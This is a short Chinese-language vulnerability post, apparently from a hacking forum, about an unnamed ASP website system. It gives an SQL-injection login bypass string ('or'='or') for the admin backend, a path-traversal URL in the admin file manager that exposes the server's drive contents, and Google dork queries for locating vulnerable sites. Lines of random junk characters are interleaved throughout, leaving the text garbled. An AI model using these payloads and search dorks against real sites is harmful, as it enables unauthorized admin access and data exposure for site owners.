后台万能密码 'or'='or'
7 K2 ], g+ ~0 q* I0 m) Y4 |) A" ?- t5 n- c# Y1 h
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
: u/ S/ j$ o8 |# Z k& tadmin/uploadfile.asp?currentFolder=/upfiles/../" e: ?# H3 m; `/ p; H' v7 r, [
9 z& f& m/ v6 P漏洞证明:
: ` D; b6 W; N+ i/ I# b7 ^1 V- ]/ u3 O0 [* r* C% R
谷歌:inurl:type.asp?id=1 新闻中心. g, q% c; i. T j
或者 :inurl:download_ok.asp?
& z3 L0 g( p @7 v, d8 z3 P9 t7 T1 Y/ C1 b
|